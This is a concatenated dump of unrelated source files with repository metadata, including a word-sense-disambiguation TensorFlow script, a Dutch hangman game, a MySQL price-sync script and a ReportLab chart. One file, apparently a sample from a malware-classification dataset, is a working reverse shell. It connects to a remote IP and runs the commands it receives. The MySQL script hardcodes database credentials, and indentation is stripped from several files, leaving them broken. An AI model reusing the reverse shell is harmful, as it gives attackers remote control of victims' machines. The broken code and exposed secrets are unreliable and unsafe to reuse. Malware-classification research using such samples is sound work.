wsd_test_x = codecs.open('51409_test_data', mode = 'r', encoding= 'utf-8')
line = wsd_test_x.readline()
list1 = []
while line:
a = line.split()
b = a[3:]
list1.append(b)
line = wsd_test_x.readline()
    wsd_test_x.close()
    return np.array(list1)
def load_wsd_train_y():
wsd_train_y = codecs.open('51409_train_target', mode = 'r', encoding = 'utf-8')
line = wsd_train_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_train_y.readline()
    wsd_train_y.close()
    return (np.array(list1)).reshape(50,)
def load_wsd_test_y():
wsd_test_y = codecs.open('51409_test_target', mode = 'r', encoding = 'utf-8')
line = wsd_test_y.readline()
list1 = []
while line:
a = line.split()
b = a[1:2]
list1.append(b)
line = wsd_test_y.readline()
    wsd_test_y.close()
    return (np.array(list1)).reshape(50,)
b = np.zeros(50)
wsd_train_x = load_wsd_train_x()
wsd_test_x = load_wsd_test_x()
wsd_train_y = load_wsd_train_y()
wsd_train_y = to_categorical(wsd_train_y)
wsd_train_y = np.c_[wsd_train_y, b]
wsd_test_y = load_wsd_test_y()
wsd_test_y = to_categorical(wsd_test_y)
#wsd_test_y = np.c_[wsd_test_y, b]
max_epoch = 100
train_size = wsd_train_x.shape[0]
batch_size = 10
n_batch = train_size // batch_size
layer_num = 2
gogi_num = 5
if layer_num == 3:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W1 = tf.Variable(tf.zeros([768, 50]))
b1 = tf.Variable(tf.zeros([50]))
L1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)
W2 = tf.Variable(tf.zeros([50, gogi_num]))
    b2 = tf.Variable(tf.zeros([gogi_num]))  # fixed: tf.zeros takes a shape list
    logits = tf.matmul(L1, W2) + b2
    predict = tf.nn.softmax(logits)
if layer_num == 2:
x = tf.placeholder(tf.float32, [None, 768])
y = tf.placeholder(tf.float32, [None, gogi_num])
W = tf.Variable(tf.zeros([768, gogi_num]))
b = tf.Variable(tf.zeros([gogi_num]))
    logits = tf.matmul(x, W) + b
    predict = tf.nn.softmax(logits)
# pass the raw logits to the loss; softmax_cross_entropy_with_logits_v2 applies softmax internally
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=logits))
train_step = tf.train.AdamOptimizer().minimize(loss)
init = tf.global_variables_initializer()
correct_predict = tf.equal(tf.argmax(y, 1), tf.argmax(predict, 1))
accuracy = tf.reduce_mean(tf.cast(correct_predict, tf.float32))
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(init)
saver.restore(sess, 'model/51409_wsd_model.ckpt')
print("51409(normal) : " + str(sess.run(accuracy, feed_dict={x:wsd_test_x, y:wsd_test_y})))
| [
"[email protected]"
]
| |
073ae140ad00c7ec2e062e9a960cdce49fe8b96f | e1164e094527d4c987adc9c9147788b0f9ed8af3 | /main.py | 61d3d780e6d7f9dd8110c8b40faaa609f9a2ce7b | []
| no_license | marenthedejong/LaMa-Galgje | d30d5ae9edacbeaf1ee90c4f956f1efa8e8e10b8 | e31f89e291b91af53425c67a28726f4e633de66b | refs/heads/master | 2022-11-12T14:42:09.260316 | 2020-07-03T09:07:58 | 2020-07-03T09:07:58 | 273,059,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | def galgje():
import random
    # picks a random word from the list
words= ['informatica', 'informatiekunde', 'spelletje', 'aardigheidje', 'scholier','fotografie', 'waardebepaling', 'specialiteit', 'verzekering','universiteit','heesterperk']
    # all the words the computer can choose from
word = random.choice(words)
    # defines the variable 'word' and has the computer pick a random word
print('Welkom bij lama galgje!')
naam = input("Hoe heet je? ")
    # asks for the user's name
def printHallo(naam):
print('Hallo ' + naam + ', veel plezier!')
        # personalized welcome message
printHallo(naam)
print('Je mag geen cijfers invoeren en je mag slechts 1 letter tegelijk raden. Als je een cijfer intoetst gaat dit niet van je beurten af, maar als je meer letters tegelijk probeert te raden gaat er wel een beurt af. Je mag door zolang je nog beurten hebt.')
    # game rules
print('Je hebt 5 beurten! Het woord is', + len(word), 'letters lang')
    # shows how long the word is
guesses = ''
turns = 5
    # allows a maximum of 5 turns
guessed =[]
    # list of incorrectly guessed letters
while turns > 0:
        # what happens while there are turns left
failed = 0
        # counts how many letters are still hidden
for letter in word:
if letter in guesses:
print(letter)
else:
print("_")
                # shows the word length, with correctly guessed letters in place
failed +=1
                # the hidden-letter count increases by 1
if failed == 0:
print(naam, ', je hebt gewonnen, gefeliciteerd!')
print("Het woord is: ", word)
opnieuw()
            # victory message and prompt to play again
guess= input("Raad een letter:").lower()
        # asks for a guess and makes it case-insensitive
if guess.isnumeric() == True:
print('Je mag geen cijfers gebruiken!')
            # shows an error message when a digit is entered
guesses += guess
        # stores the guessed letter in guesses
        if guess not in word and guess.isalpha() and len(guess) == 1:
            # this only runs when the guess is a single letter that is not in the word
turns -= 1
            # the number of turns decreases by 1
print("FOUT")
print("Je hebt nog maar", + turns, 'beurten!')
guessed.append(guess)
guessed.sort()
            # keeps the wrongly guessed letters in an alphabetically sorted list
print('Deze letters zitten niet in het woord:', guessed)
if len(guess) >1 and guess.isalpha():
print('Je mag slechts 1 letter per keer raden!')
turns -= 1
print("Je hebt nog maar", + turns, 'beurten!')
            # if the input is longer than 1 character, a turn is lost and an error message is shown
if turns == 0:
print(naam,', je hebt verloren, jammer joh!')
print("Het woord is: ", word)
opnieuw()
            # losing message when the turns run out
def opnieuw():
restart = input("Wil je opieuw spelen?").lower()
if restart == 'ja':
galgje()
elif restart == 'nee':
print('Bedankt voor het spelen, tot ziens!')
exit()
    # function to replay the game: on 'ja' the game restarts, otherwise it stops
galgje()
# starts the game
| [
"[email protected]"
]
| |
5269768f48133f066bb8f41c8cc9fb9b612d37d5 | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/keyence2020/C.py | f98ff9ef1e9b01b229f3ad4b4041387f38e11c0f | [
"MIT"
]
| permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | n, k, s = map(int, input().split())
ans = []
for i in range(k):
ans.append(s)
for i in range(n - k):
if s + 1 <= 10 ** 9:
ans.append(s + 1)
else:
ans.append(1)
print(*ans)
| [
"[email protected]"
]
| |
309d604e8f4d7daa6c149baff161a6a0f70af028 | 38ba13df9ea6e53c7b924cad1f3bea2de59c7a6a | /nibbler/trading/collectors/testfiles/LINKMAGIC.py | 7312066a4729b9b7734069827034756e0c85723b | []
| no_license | JizzFactoryEmployee/nibblerppman | 0fbc1ce662cf8b4868b41a97291250fae29dc41d | 160e557578a3e8a614450354f6ade233d32b052f | refs/heads/master | 2022-11-14T01:10:31.743000 | 2020-07-04T01:21:52 | 2020-07-04T01:21:52 | 273,835,770 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | import pymysql
import time
import pandas as pd
from tqdm import tqdm
from datetime import datetime, timedelta
def LINK():
print('LINKMAGIC START')
try:
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
        # if the file is still being populated it won't be found, so wait while it populates
except FileNotFoundError:
time.sleep(600)
data = pd.read_csv(r'/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv')
#set up the main connection
my_conn = pymysql.connect(
host='nibbler.cxadmpob69hk.ap-southeast-2.rds.amazonaws.com',
port=3306,
db='CoinData',
user='Nibbler',
password='Nibbler123',
local_infile=1)
my_cursor = my_conn.cursor()
#selecting the last date time value from the database
my_cursor.execute(''' select count(*) from LINK; ''')
result = my_cursor.fetchall()
a = str(result).strip("(,)")
my_cursor.close()
try:
        result = int(a)
except ValueError:
pass
print('LINK the database length is equal to :',result)
print('LINK the csv length is equal to:', len(data))
if result == 0 or result == None:
print('====LINK DATABASE IS EMPTY TIME TO POPULATE=======')
my_cursor = my_conn.cursor()
start1 = time.time()
#pushing data into the database from the CSV file
my_cursor.execute(''' LOAD DATA LOCAL INFILE '/home/nibbler/nibblerppman/nibbler/trading/collectors/coins/LINK/1m/LINK1m.csv' IGNORE INTO TABLE LINK
FIELDS TERMINATED BY ',' ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES;''')
my_cursor.execute('SHOW WARNINGS')
my_conn.commit()
end1 = time.time()
my_cursor.close()
my_cursor = my_conn.cursor()
#getting the length of the database file
my_cursor.execute(''' select COUNT(*) FROM LINK; ''')
Clean_results = my_cursor.fetchall()
Clean_results = str(Clean_results).strip("(,)")
Clean_results = int(Clean_results)
my_cursor.close()
print('total values pushed', Clean_results)
print('=====PUSHED ENTIRE HISTORY IN:', end1-start1)
if Clean_results != len(data):
            print('something went wrong, probably a data error')
gap = len(data) - result
if result < len(data) and result > 0:
        print('this means we can push a single value or we have a data error')
#if the result is less than the data by one
print('gap is equal to', gap,'therefore we need to push', gap, 'points to the database')
        # get the last `gap` candles from the csv
x = gap*-1
to_push = []
        gap_range = list(range(0, gap))
        for i in gap_range:
lastpoints = data.iloc[x][0], data.iloc[x][1], data.iloc[x][2], float(data.iloc[x][3]), float(data.iloc[x][4]), float(data.iloc[x][5]), float(data.iloc[x][6]), float(data.iloc[x][7])
print(lastpoints)
to_push.append(lastpoints)
x = x+1
y = 0
for i in to_push:
pair_1 = to_push[y][0]
pair_2 = to_push[y][1]
            Date_Time = str(round(to_push[y][2], 0))  # adjust these values to match the database schema for each coin
Open_price = str(round(to_push[y][3], 4))
High_price = str(round(to_push[y][4], 4))
Low_price = str(round(to_push[y][5], 4))
Close_price = str(round(to_push[y][6], 4))
Volume = str(round(to_push[y][7], 4))
y = y+1
start2 = time.time()
my_cursor = my_conn.cursor()
my_cursor.execute('INSERT INTO LINK VALUES (%s,%s,%s,%s,%s,%s,%s,%s)', (pair_1, pair_2, Date_Time, Open_price, High_price, Low_price, Close_price, Volume))
my_conn.commit()
end2 = time.time()
if result > len(data):
        print('something went wrong, database is somehow longer than the csv, deleting all')
my_cursor = my_conn.cursor()
my_cursor.execute(''' DELETE FROM LINK; ''')
my_conn.commit()
my_cursor.close()
print('data has been wiped, will repopulate next update')
if result == len(data):
print('SAME LENGTH DO NOTHING')
print('LINKMAGIC DONE')
LINK() | [
"[email protected]"
]
| |
e246af544e6034e6529a229fa0c7a967c984b397 | 4bd555bc662b8182a2e7644976bfdb00ed5e1ebe | /PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/graphics/samples/stacked_column.py | dab8e32684f6ea7fd3144eb49b058d14b19b4968 | []
| no_license | fhelmli/homeNOWG2 | a103df1ef97194dec9501dbda87ec1f7c111fb4a | e794fd87b296544542fd9dc7ac94c981c6312419 | refs/heads/master | 2020-04-04T13:40:20.417769 | 2019-01-30T21:41:04 | 2019-01-30T21:41:04 | 155,970,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,047 | py | #import pythonista
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.charts.legends import Legend
from reportlab.graphics.charts.barcharts import VerticalBarChart
from reportlab.graphics.shapes import Drawing, _DrawingEditorMixin, String
from reportlab.graphics.charts.textlabels import Label
from reportlab.graphics.samples.excelcolors import *
class StackedColumn(_DrawingEditorMixin,Drawing):
def __init__(self,width=200,height=150,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self._add(self,VerticalBarChart(),name='chart',validate=None,desc="The main chart")
self.chart.width = 115
self.chart.height = 80
self.chart.x = 30
self.chart.y = 40
self.chart.bars[0].fillColor = color01
self.chart.bars[1].fillColor = color02
self.chart.bars[2].fillColor = color03
self.chart.bars[3].fillColor = color04
self.chart.bars[4].fillColor = color05
self.chart.bars[5].fillColor = color06
self.chart.bars[6].fillColor = color07
self.chart.bars[7].fillColor = color08
self.chart.bars[8].fillColor = color09
self.chart.bars[9].fillColor = color10
self.chart.fillColor = backgroundGrey
self.chart.barLabels.fontName = 'Helvetica'
self.chart.valueAxis.labels.fontName = 'Helvetica'
self.chart.valueAxis.labels.fontSize = 7
self.chart.valueAxis.forceZero = 1
self.chart.data = [(100, 150, 180), (125, 180, 200)]
self.chart.groupSpacing = 15
self.chart.valueAxis.avoidBoundFrac = 1
self.chart.valueAxis.gridEnd = 115
self.chart.valueAxis.tickLeft = 3
self.chart.valueAxis.visibleGrid = 1
self.chart.categoryAxis.categoryNames = ['North', 'South', 'Central']
self.chart.categoryAxis.tickDown = 3
self.chart.categoryAxis.labels.fontName = 'Helvetica'
self.chart.categoryAxis.labels.fontSize = 7
self._add(self,Label(),name='Title',validate=None,desc="The title at the top of the chart")
self.Title.fontName = 'Helvetica-Bold'
self.Title.fontSize = 7
self.Title.x = 100
self.Title.y = 135
self.Title._text = 'Chart Title'
self.Title.maxWidth = 180
self.Title.height = 20
self.Title.textAnchor ='middle'
self._add(self,Legend(),name='Legend',validate=None,desc="The legend or key for the chart")
self.Legend.colorNamePairs = [(color01, 'Widgets'), (color02, 'Sprockets')]
self.Legend.fontName = 'Helvetica'
self.Legend.fontSize = 7
self.Legend.x = 153
self.Legend.y = 85
self.Legend.dxTextSpace = 5
self.Legend.dy = 5
self.Legend.dx = 5
self.Legend.deltay = 5
self.Legend.alignment ='right'
self._add(self,Label(),name='XLabel',validate=None,desc="The label on the horizontal axis")
self.XLabel.fontName = 'Helvetica'
self.XLabel.fontSize = 7
self.XLabel.x = 85
self.XLabel.y = 10
self.XLabel.textAnchor ='middle'
self.XLabel.maxWidth = 100
self.XLabel.height = 20
self.XLabel._text = "X Axis"
self._add(self,Label(),name='YLabel',validate=None,desc="The label on the vertical axis")
self.YLabel.fontName = 'Helvetica'
self.YLabel.fontSize = 7
self.YLabel.x = 12
self.YLabel.y = 80
self.YLabel.angle = 90
self.YLabel.textAnchor ='middle'
self.YLabel.maxWidth = 100
self.YLabel.height = 20
self.YLabel._text = "Y Axis"
self.chart.categoryAxis.style='stacked'
self._add(self,0,name='preview',validate=None,desc=None)
if __name__=="__main__": #NORUNTESTS
StackedColumn().save(formats=['pdf'],outDir=None,fnRoot='stacked_column')
| [
"[email protected]"
]
| |
7ce3e7e2038833d38156599981f270e711b011b1 | f5d4863b6a62ef19ffc98e4f94f6ade1bc8810d3 | /Math/367_Valid_Perfect_Square.py | a0388e81d9425056f254fc88419d9f743ed97c3e | []
| no_license | xiaomojie/LeetCode | 138808eb83938f9bd3c2e8a755d908509dff0fd3 | eedf73b5f167025a97f0905d3718b6eab2ee3e09 | refs/heads/master | 2021-06-12T09:26:01.257348 | 2019-10-23T10:41:06 | 2019-10-23T10:41:06 | 76,184,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | """
Determine whether the given num is the square of an integer.
Newton's method for square roots:
Let r be a root of y = f(x). Given an initial value x0, draw the tangent line at x0,
y = f(x0) + f'(x0)(x - x0), and take its intersection with the x-axis,
x1 = x0 - f(x0)/f'(x0), as the first approximation of r; then draw the tangent at
(x1, f(x1)) and repeat. The iteration is therefore x_{n+1} = x_n - f(x_n)/f'(x_n).
For the square root, solve x^2 - n = 0, i.e. f(x) = x^2 - n with f'(x) = 2x, so:
x_{n+1} = x_n - (x_n^2 - n)/(2*x_n) = x_n - x_n/2 + n/(2*x_n) = (x_n + n/x_n)/2
"""
class Solution(object):
def isPerfectSquare1(self, num):
"""
:type num: int
:rtype: bool
"""
r = num
while r * r > num:
r = (r + num//r)//2
return r * r == num
    # Method 2: a square number is 1+3+5+7+...
def isPerfectSquare(self, num):
i = 1
while num > 0:
num -= i
i += 2
return num == 0
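# Quick illustrative check (not part of the original solution):
# s = Solution()
# print(s.isPerfectSquare1(16), s.isPerfectSquare1(14))  # True False
# print(s.isPerfectSquare(25))                           # True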
| [
"[email protected]"
]
| |
2c0cf2b46fe03109d5b7538f2b181faa0c18b80b | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad190.py | b096d9fe7ec9f3748275958a6e172021d34f49a2 | []
| no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | import subprocess
import hmac
import crypt
import hashlib
import zlib
import lzma
import threading
import bz2
import zipfile
import socket
import tarfile
import gzip
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
]
| |
199e2fddf75cc9277b94c8b9a7376bad6d387ac5 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2718/60652/241534.py | 867df002441925aee0423dd0522251ff896ef573 | []
| no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | l=list("".join(input()))
s = input().replace(',', '').replace('[', '').replace(']', '')
index = 0
while index < len(s):
    # swap the characters at the two single-digit indices
    tmp = l[int(s[index])]
    l[int(s[index])] = l[int(s[index + 1])]
    l[int(s[index + 1])] = tmp
    index += 2
print("".join(str(i) for i in l)) | [
"[email protected]"
]
| |
1004513e523a8b184e8173e8b69e9a53a562c1fa | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysis_20210714170213.py | eae24aaa6aeaeaa15be715ad62f451d4bb3f3610 | []
| no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,537 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
"""
The units used are SI standard
"""
class ConstrainsAnalysis_Mattingly_Method:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0, C_DR=0):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.K1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.K2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.C_D0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.C_DR = C_DR
self.W_S = wing_load
self.g0 = 9.80665
self.coeff = (1-self.hp) * self.beta / self.alpha
def master_equation(self, n, dh_dt, dV_dt):
q = 0.5 * self.rho * self.v ** 2
linear_term = self.K1 * n ** 2 * self.beta / q
inverse_term = (self.C_D0 + self.C_DR) * q / self.beta
constant_term = self.K2 * n + dh_dt / self.v + dV_dt / self.g0
# print(linear_term,'\n', inverse_term, '\n', constant_term)
P_WTO = self.coeff * (linear_term * self.W_S + inverse_term / self.W_S + constant_term) * self.v
return P_WTO
def cruise(self):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return P_WTO
def climb(self, roc):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return P_WTO
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return P_WTO
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
P_WTO = 2 / 3 * self.coeff * self.beta * K_TO ** 2 / (s_G * self.rho * self.g0 * Cl_max_to) * self.W_S ** (
3 / 2)
return P_WTO
def stall_speed(self):
V_stall_to = 65
V_stall_ld = 62
Cl_max_to = 2.32
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * Cl_max_to
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * Cl_max_ld
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
P_WTO = ConstrainsAnalysis_Mattingly_Method.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return P_WTO
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
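# Minimal usage sketch (values are illustrative, not from the original study):
# problem = ConstrainsAnalysis_Mattingly_Method(altitude=11300, velocity=230,
#                                               beta=0.948, wing_load=5000)
# p_wto = problem.cruise()  # required sea-level power-to-weight ratio, W/N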
class ConstrainsAnalysis_Gudmundsson_Method:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.hp = Hp
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.q = 0.5 * self.rho * self.v ** 2
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
self.cd_min = 0.02
self.cd_to = 0.03
self.cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
def cruise(self):
p_w = self.q * self.cd_min / self.w_s + self.k / self.q * self.w_s
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k / self.q * self.w_s
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q * (self.cd_min / self.w_s + self.k * (load_factor / q) ** 2 * self.w_s)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
"""
t_w = 0.3
s = 124
cd_max = 0.04
l = 0.5 * self.rho * self.v ** 2 * s * self.w_s / self.q
d_max = 0.5 * self.rho * self.v ** 2 * s * cd_max
# equation 18-24: Airspeed for Best ROC for a Jet
vy = (t_w * self.w_s / (3 * self.rho * self.cd_min) * (1 + (1 + 3 / (l * d_max ** 2 * t_w ** 2)) ** 0.5)) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / self.v + q / self.w_s * (self.cd_min + self.k * (self.w_s / q) ** 2)
"""
p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * Cl_max_to
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * Cl_max_ld
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 250
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.8], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
problem1 = ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 0:
pa, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
pb, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
l1 = plt.legend([pa, pb], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
    # turn the stall-speed rows (stored as wing-load limits W/S) into
    # near-vertical lines so they plot as wing-load boundaries
    p_w[0, :] = 10 ** 10 * (w_s - p_w[0, 2])
    p_w[m, :] = 10 ** 10 * (w_s - p_w[m, 2])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label='feasible region Gudmundsson')
plt.fill_between(w_s, np.amax(p_w[m:2 * m-1, :], axis=0), 200, color='r', alpha=0.25,
label='feasible region Mattingly')
plt.plot(6012, 72, 'r*', markersize=10, label='True Conventional')
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.title(r'Constraint Analysis: $\bf{without}$ $\bf{DP}$ - Normalized to Sea Level')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
]
| |
4168c9aca8547d6a3efc4a82c8b4fcdd1f820471 | 91365d8ef539a9952f048e1fef03b6f76a0ccf60 | /torch/onnx/_internal/fx/__init__.py | a3037f1cf29a2b678ab4e418fd1c190f9402063f | [
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
]
| permissive | ppwwyyxx/pytorch | 6e68cd816e8197e298c50d7f0e82cc97aff4dbdf | 2883cb464810611c5de37b2ca06771582ddf5f83 | refs/heads/master | 2023-08-10T00:39:48.165007 | 2023-06-07T01:51:59 | 2023-06-07T01:51:59 | 160,557,191 | 3 | 3 | NOASSERTION | 2018-12-05T17:53:38 | 2018-12-05T17:53:37 | null | UTF-8 | Python | false | false | 170 | py | from .context import FxToOnnxContext
from .serialization import save_model_with_external_data
__all__ = [
"save_model_with_external_data",
"FxToOnnxContext",
]
| [
"[email protected]"
]
| |
368092fc9f933ed1677b7069f0f8572a37fb26ea | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Django_Intro/bin/sqlformat | 65622073bec5cc8bc536e3d99a8912fd7b304755 | []
| no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/jhflorey/Documents/Dojo/Python/Django_Intro/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
